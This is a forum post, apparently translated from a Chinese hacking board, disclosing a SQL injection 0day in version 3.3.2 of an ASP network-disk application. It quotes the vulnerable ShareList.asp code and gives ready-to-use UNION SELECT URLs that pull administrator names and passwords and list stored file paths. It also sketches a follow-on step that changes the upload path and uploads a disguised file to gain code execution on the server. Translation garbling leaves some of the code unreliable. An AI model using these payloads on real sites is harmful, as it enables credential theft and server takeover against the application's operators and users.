Source: bbs.erpangzi.com
Author: My5t3ry
Xxasp network hard disk v3.3.2 SQL injection 0day
I will not introduce this system much. The vulnerability involves the file MyFiles. asp ShareList. asp,
Using ShareList. asp as an example, the code is as follows:
Dim MyOrderBy, MyCondition, MyTopField, SearchType, SearchCondition
SearchType = Trim (Request ("SearchType "))
SearchCondition = Trim (Request ("SearchCondition") // injection point
If SearchType = "" Then SearchType = "BaseSearch"
If SearchCondition = "" Then SearchCondition = "1"
MyTopField = ""
Select Case SearchType
Case "BaseSearch"
Select Case SearchCondition
Case "2"
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (h, A.F _ AddTime," & SqlNowString & ") <25"
Case "3"
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (d, F_AddTime," & SqlNowString & ") <3"
Case "4"
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (d, A.F _ AddTime," & SqlNowString & ") <7"
Case "5"
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (d, A.F _ AddTime," & SqlNowString & ") <21"
Case "6"
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (m, A.F _ AddTime," & SqlNowString & ") <1"
Case "7"
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (m, A.F _ AddTime," & SqlNowString & ") <3"
Case "8"
MyTopField = "Top 100": MyOrderBy = "A.F _ DownloadTimes Desc": MyCondition = ""
Case "9"
If ClsPub. TW_Config (42) <= 1 Then
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (h, A.F _ AddTime," & SqlNowString & ") <25"
Else
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (d, A.F _ AddTime," & SqlNowString & ") <" & ClsPub. TW_Config (42)
End If
Case "10"
If ClsPub. TW_Config (42) <= 1 Then
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (h, A.F _ AddTime," & SqlNowString & ")> 25"
Else
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "Datediff (d, A.F _ AddTime," & SqlNowString & ")>" & ClsPub. TW_Config (42)
End If
Case Else
MyOrderBy = "A.F _ AddTime Desc": MyCondition = ""
End Select
Case "SearchFileType"
If SearchCondition <> "1" Then
MyOrderBy = "A.F _ AddTime Desc": MyCondition = "A.F _ Ext =" & Lcase (SearchCondition) & "" // If SearchCondition is not 1, import the SQL query
Else
MyOrderBy = "A.F _ AddTime Desc": MyCondition = ""
End If
Exp: after registration and login,Http://www.xxx.com/disk/ShareList.asp? Action = Main& SearchType = SearchFileType & SearchCondition = rar and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, AdminName, AdminPwd, 14,15, 16
After entering the background, the system basic settings => file storage path is changed to UpLoadFiles. asp/. Then, the system returns to the foreground to upload an image with a suffix changed, and then lists the file addresses with statements.
Http://www.xxx.com/disk/ShareList.asp? Action = Main& SearchType = SearchFileType & SearchCondition = rar and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, F_Path, 13, 14, 15, 16, 17 from TW_FilesList where 1 = 1